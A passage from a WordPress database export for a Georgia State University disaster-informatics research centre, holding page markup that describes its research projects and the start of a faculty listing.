v-inner-lg-2 v-inner-md-2 v-inner-2 style-391 style-local-126-c35 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c36\" class=\"h-global-transition-all h-heading style-392 style-local-126-c36 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-392 style-local-126-c36\">\n <!---->\n <!---->\n <h5 class=\"\">Urban Scale Energy Assessments</h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c37\" class=\"h-text h-text-component style-394 style-local-126-c37 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities\n in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment\n of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption\n patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings to create a gradient of energy usage with the granularity of a single building and\n propose a plan for grid distribution optimized for human-centric usage and need.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c14\" id=\"about-3\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-353 style-local-126-c14 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-354 style-local-126-c15 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-355-outer style-local-126-c16-outer\">\n <div data-colibri-id=\"126-c16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-355 style-local-126-c16 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c17\" class=\"h-global-transition-all h-heading style-356 style-local-126-c17 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-356 style-local-126-c17\">\n <!---->\n <!---->\n <h5 class=\"\">Understanding Disaster Impacts using the NOAA Storm Events Database</h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c18\" class=\"h-text h-text-component style-358 style-local-126-c18 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned\n documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative/s have the potential\n of containing crucial information about the episodes/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This\n two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-359-outer style-local-126-c19-outer\">\n <div data-colibri-id=\"126-c19\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-359 style-local-126-c19 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c38\" id=\"about\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-866 style-local-126-c38 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"126-c39\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-867 style-local-126-c39 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-868-outer style-local-126-c40-outer\">\n <div data-colibri-id=\"126-c40\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-868 style-local-126-c40 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-869-outer style-local-126-c41-outer\">\n <div data-colibri-id=\"126-c41\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-869 style-local-126-c41 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c44\" class=\"h-text h-text-component style-872 style-local-126-c44 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>The goal of broadening participation in computing (BPC) must address inequities in access to preparatory CS training at the K-12 level. Inequitable allocation of resources follows racial, ethnic, and socio-economic divides across school\n districts leading to disparate opportunities of early access to CS education. Considering the multitude of factors that contribute to a risk of access to CS education, the goal of this project is to determine if a combination of\n demographic, socio-economic, and school enrollment factors can be used to locate Racially Inequitable Computer Science (RICS) deserts. RICS Deserts will be used to determine strategic locations to place resources (e.g. AP classes,\n and CS teachers) or interventions (e.g. summer camps, after school programs, student clubs) to achieve greatest impact. </p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c26\" id=\"about-5\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-381 style-local-126-c26 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c27\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-382 style-local-126-c27 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-383-outer style-local-126-c28-outer\">\n <div data-colibri-id=\"126-c28\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-383 style-local-126-c28 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c29\" class=\"h-global-transition-all h-heading style-384 style-local-126-c29 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-384 style-local-126-c29\">\n <!---->\n <!---->\n <h5 class=\"\">ORPHEUS</h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c30\" class=\"h-text h-text-component style-386 style-local-126-c30 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of\n the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that\n can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-387-outer style-local-126-c31-outer\">\n <div data-colibri-id=\"126-c31\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-387 style-local-126-c31 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c8\" id=\"about-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-346 style-local-126-c8 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c9\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-347 style-local-126-c9 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-348-outer style-local-126-c10-outer\">\n <div data-colibri-id=\"126-c10\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-348 style-local-126-c10 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-349-outer style-local-126-c11-outer\">\n <div data-colibri-id=\"126-c11\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-349 style-local-126-c11 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c12\" class=\"h-global-transition-all h-heading style-350 style-local-126-c12 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-350 style-local-126-c12\">\n <!---->\n <!---->\n <h5 class=\"\">GSU Contact Network Prediction</h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c13\" class=\"h-text h-text-component style-352 style-local-126-c13 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion/goat/snake fire-breathing creature, which reflects our approach to this\n research. We are using an ensemble of simulation types/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible\n to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to\n account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts\n to reduce the number of “scheduled” contacts a GSU student makes throughout the day.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c45\" id=\"about-7\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-873 style-local-126-c45 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"126-c46\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-874 style-local-126-c46 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-875-outer style-local-126-c47-outer\">\n <div data-colibri-id=\"126-c47\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-875 style-local-126-c47 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c48\" class=\"h-global-transition-all h-heading style-876 style-local-126-c48 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-876 style-local-126-c48\">\n <!---->\n <!---->\n <h5 class=\"\">DICE Data Repository</h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c50\" class=\"h-text h-text-component style-878 style-local-126-c50 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p><span style=\"font-weight: 400; font-size: 16px; font-family: "Open Sans"; color: rgb(64, 85, 169);\">The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed ontology will define semantics associated with adverse events & corresponding response and recovery efforts. </span></p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-879-outer style-local-126-c51-outer\">\n <div data-colibri-id=\"126-c51\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-879 style-local-126-c51 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','Research','','publish','closed','closed','','our-research','','','2023-09-29 11:19:47','2023-09-29 15:19:47','',0,'https://gsudice.dataconn.net/?page_id=126',0,'page','',0),(138,1,'2023-09-29 11:36:36','2022-02-15 17:08:23',' ','','','publish','closed','closed','','138','','','2023-09-29 11:36:36','2023-09-29 15:36:36','',0,'https://gsudice.dataconn.net/?p=138',1,'nav_menu_item','',0),(141,1,'2022-02-15 17:16:42','2022-02-15 17:16:42','https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-cropped-header-scaled-1.jpg','cropped-cropped-header-scaled-1.jpg','','inherit','open','closed','','cropped-cropped-header-scaled-1-jpg','','','2022-02-15 17:16:42','2022-02-15 17:16:42','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-cropped-header-scaled-1.jpg',0,'attachment','image/jpeg',0),(168,1,'2022-02-15 18:02:51','2022-02-15 18:02:51','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Overlappable\",\"attrs\":{\"id\":\"overlappable\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"20-c4\",\"parentId\":\"20-c3\",\"partialId\":20,\"styleRef\":336,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"20-c5\",\"parentId\":\"20-c3\",\"partialId\":20,\"styleRef\":337,\"type\":\"content\"}],\"id\":\"20-c3\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":335,\"type\":\"content\"},{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"20-c7\",\"parentId\":\"20-c6\",\"partialId\":20,\"children\":[{\"name\":\"hop-heading\",\"slot\":null,\"parentId\":\"20-c7\",\"index\":0,\"id\":\"20-c8\",\"partialId\":20,\"styleRef\":334,\"type\":\"content\",\"props\":{\"content\":\"Focus Areas<br>\"}}],\"styleRef\":333,\"type\":\"content\"}],\"id\":\"20-c6\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":331,\"type\":\"content\"},{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"20-c10\",\"parentId\":\"20-c9\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c10\",\"index\":0,\"id\":\"20-c11\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/server\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c10\",\"index\":1,\"id\":\"20-c12\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"disease & disaster modeling<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c10\",\"index\":1,\"id\":\"20-c13\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Develop data-driven, computational solutions to address challenges posed by disaster and disease risk assessment, forecasting, and mitigation, including issues aimed at assessing and reducing structural disparities<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c14\",\"parentId\":\"20-c9\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c14\",\"index\":0,\"id\":\"20-c15\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/database\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c14\",\"index\":1,\"id\":\"20-c16\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"data as a service<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c14\",\"index\":1,\"id\":\"20-c17\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Provide data and computational support to researchers who need extensive data processing and analysis but may not have the necessary technical skills and computational infrastructure<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c18\",\"parentId\":\"20-c9\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c18\",\"index\":0,\"id\":\"20-c19\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/users\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c18\",\"index\":1,\"id\":\"20-c20\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"Impact assessment<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c18\",\"index\":1,\"id\":\"20-c21\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Facilitate application of data analysis tools that can spark critical insights into the impacts of disasters and diseases on societies and the environment, particularly among vulnerable population groups<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"}],\"id\":\"20-c9\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":272,\"type\":\"content\"}],\"id\":\"20-c2\",\"parentId\":\"20-c1\",\"partialId\":20,\"styleRef\":271,\"type\":\"content\"}],\"id\":\"20-c1\",\"partialId\":20,\"styleRef\":228,\"type\":\"content\"}','','','publish','closed','closed','','168','','','2023-09-29 10:23:19','2023-09-29 14:23:19','',0,'https://gsudice.dataconn.net/?post_type=extb_post_json&p=168',0,'extb_post_json','',0),(181,1,'2022-02-15 18:06:08','2022-02-15 18:06:08','','About','','inherit','closed','closed','','122-revision-v1','','','2022-02-15 18:06:08','2022-02-15 18:06:08','',122,'https://gsudice.dataconn.net/?p=181',0,'revision','',0),(182,1,'2022-02-15 18:06:18','2022-02-15 18:06:18','<div data-colibri-id=\"182-c1\" class=\"style-407 style-local-182-c1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"182-c2\" id=\"faculty\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-970 style-local-182-c2 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <div data-colibri-id=\"182-c70\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-984 style-local-182-c70 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-985-outer style-local-182-c71-outer\">\n <div data-colibri-id=\"182-c71\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-985 style-local-182-c71 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c72\" class=\"h-global-transition-all h-heading style-986 style-local-182-c72 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-986 style-local-182-c72\">\n <!---->\n <!---->\n <h2 class=\"\">Faculty</h2>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-971 style-local-182-c3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c4-outer\">\n <div data-colibri-id=\"182-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c5\" class=\"d-block style-973 style-local-182-c5 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-cropped-cropped-headshot-1-e1651208089645-2-e1697201737742.jpg\" class=\"wp-image-1697 style-973-image style-local-182-c5-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c5-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c6\" class=\"h-global-transition-all h-heading style-974 style-local-182-c6 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-974 style-local-182-c6\">\n <!---->\n <!---->\n <h4 class=\"\">Chetan Tiwari</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c7\" class=\"h-text h-text-component style-975 style-local-182-c7 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Director</p>\n </div>\n </div>\n <div data-colibri-id=\"182-c8\" class=\"h-text h-text-component style-976 style-local-182-c8 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Geosciences</p>\n </div>\n </div>\n <div data-colibri-id=\"182-c9\" class=\"style-977 style-local-182-c9 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://www.linkedin.com/in/chetan-tiwari/\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://cas.gsu.edu/profile/chetan-tiwari/\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Font Awesome (https://fontawesome.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://scholar.google.com/citations?user=C5PVPkoAAAAJ&hl=en\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 